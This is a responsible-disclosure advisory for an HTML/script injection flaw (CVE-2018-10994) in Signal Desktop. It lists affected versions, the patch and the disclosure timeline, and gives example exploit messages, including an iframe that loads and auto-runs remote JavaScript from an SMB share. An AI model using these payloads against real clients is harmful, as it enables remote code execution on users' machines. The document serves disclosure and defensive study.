Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormJuliano RizzoPACKETSTORM:147614
HistoryMay 15, 2018 - 12:00 a.m.

Signal Desktop HTML Injection

2018-05-1500:00:00
Juliano Rizzo
packetstormsecurity.com
32

0.002 Low

EPSS

Percentile

56.0%

JSON
`Title: HTML tag injection in Signal-desktop  
  
Date Published: 14-05-2018  
  
CVE Name: CVE-2018-10994  
  
Class: Code injection  
  
Remotely Exploitable: Yes  
  
Locally Exploitable: No  
  
Vendors contacted: Signal.org  
  
Vulnerability Description:  
  
Signal-desktop is the standalone desktop version of the secure Signal  
messenger.  
This software is vulnerable to remote code execution from a malicious  
contact,  
by sending a specially crafted message containing HTML code that is  
injected  
into the chat windows (Cross-site scripting).  
  
Vulnerable Packages:  
  
Signal-desktop messenger v1.7.1  
Signal-desktop messenger v1.8.0  
Signal-desktop messenger v1.9.0  
Signal-desktop messenger v1.10.0  
  
Solution/Vendor Information/Workaround  
  
Upgrade to Signal-desktop messenger v1.10.1, v1.11.0-beta.3.  
  
Credits:  
  
This vulnerability was found and researched by:  
IvA!n Ariel Barrera Oro (@HacKanCuBa), Alfredo Ortega (@ortegaalfredo) and  
Juliano Rizzo (@julianor), with assistance from  
Javier Lorenzo Carlos Smaldone (@mis2centavos).  
  
Technical Description - Exploit/Concept Code  
  
12345678901234567890123456789012345678901234567890123456789012345678901234567890  
While discussing a XSS vulnerability on a website using the Signal-desktop  
messenger, it was found that the messenger software also displayed a  
code-injection vulnerability while parsing the affected URLs.  
The Signal-desktop software fails to sanitize specific html-encoded HTML  
tags  
that can be used to inject HTML code into remote chat windows.  
Specifically the <img> and <iframe> tags can be used to include remote  
or local  
resources. For example, the use of iframes enables full code execution,  
allowing  
an attacker to download/upload files, information, etc. The <script>  
tag was  
also found injectable.  
In the Windows operative system, the CSP fails to prevent remote  
inclusion of  
resources via the SMB protocol. In this case, remote execution of  
JavaScript can  
be achieved by referencing the script in a SMB share as the source of an  
iframe tag, for example: <iframe src=\\DESKTOP-XXXXX\Temp\test.html>.  
The included javascript code is then executed automatically, without any  
interaction needed from the user. The vulnerability can be triggered in the  
Signal-Desktop client by sending a specially crafted message. Example  
messages:  
  
Show an iframe with some text:  
  
http://hacktheplanet/?p=%3Ciframe%20srcdoc="<p>PWONED!!</p>"%3E%3C/iframe%3E  
  
Show a base64-encoded image (bypass "click to download image"):  
  
http://hacktheplanet/?p=%3Cimg%20src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQEASABIAAD/2wBDACgcHiMeGSgjISMtKygwPGRBPDc3PHtYXUlkkYCZlo+AjIqgtObDoKrarYqMyP/L2u71////m8H////6/+b9//j/wAALCAAtADwBAREA/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/9oACAEBAAA/AMapRbv5YckKD0z1pPJbjJAzSGIgjcQMnFEkZSTZkE+1STWksTKrAZbpThYzfLuAUN3JFJ9kkyeV4PrTBFyNzCpSGuZiRgY4ArRgtAvzSfMfSqN3EYpjsA2noTg1B87HlqNrnqxP40nlt6ml8pvWo/MY/wARqzAzcEVorK24RuAAw4IqLUo2EKFFJIOM9azN8oOMkfhTz9oVdxDhfWlR3ZOWJ/Gpdzep/OqVTQEq2MVpo4aNWABKHnNLIzNHGW7OST6DFZ92wEoAGAvX3qNrl/KaEH5CePaliPyYqVTwKrIu41O1u0Z4BP06irUDKiky5DYx04p8sxddpwFA6etZcrFnJPepLa2NwSFPIoQbQVPUHFTLjFUskd6d5j/3m/Ok3sf4j+dG9j/EfzpKVXZPusR9DSZPrS7j6mv/2Q=="%3e  
  
Include and auto-execute a remote JavaScript file (for Windows  
clients):  
  
http://hacktheplanet/?p=%3d%3Ciframe%20src=\\XXX.XXX.XXX.XXX\Temp\test.html%3E  
  
Timeline:  
  
* 2018-05-10 18:45 GMT-3: vuln discovered  
  
* 2018-05-11 13:03 GMT-3: emailed Signal security team  
  
* 2018-05-11 15:02 GMT-3: reply from Signal: vuln confirmed & patch  
ongoing  
  
* 2018-05-11 16:12 GMT-3: patch committed  
  
* 2018-05-11 18:00 GMT-3: signal-desktop update published  
  
* 2018-05-14 18:00 GMT-3: public disclosure  
  
  
References:  
* Patch:  
https://github.com/signalapp/Signal-Desktop/compare/v1.11.0-beta.2...v1.11.0-beta.3  
* Writeup:  
https://ivan.barreraoro.com.ar/signal-desktop-html-tag-injection/  
`

Related

prion 2
cve 2
cvelist 2
nvd 2
osv 2
packetstorm 1
thn 1
prion
prion
Open redirect
2018-05-14 23:29:00
Design/Logic Flaw
2018-05-17 19:29:00
cve
cve
CVE-2018-10994
2018-05-14 23:29:00
CVE-2018-11101
2018-05-17 19:29:00
cvelist
cvelist
CVE-2018-10994
2018-05-14 23:00:00
CVE-2018-11101
2018-05-17 19:00:00
nvd
nvd
CVE-2018-10994
2018-05-14 23:29:00
CVE-2018-11101
2018-05-17 19:29:00
osv
osv
CVE-2018-10994
2018-05-14 23:29:00
CVE-2018-11101
2018-05-17 19:29:00
packetstorm
packetstorm
Signal Desktop HTML Tag Injection Variant 2
2018-05-16 00:00:00
thn
thn
Another severe flaw in Signal desktop app lets hackers steal your chats in plaintext
2018-05-16 14:14:00

0.002 Low

EPSS

Percentile

56.0%

JSON
Related for PACKETSTORM:147614
prion2cve2cvelist2nvd2osv2packetstorm1thn1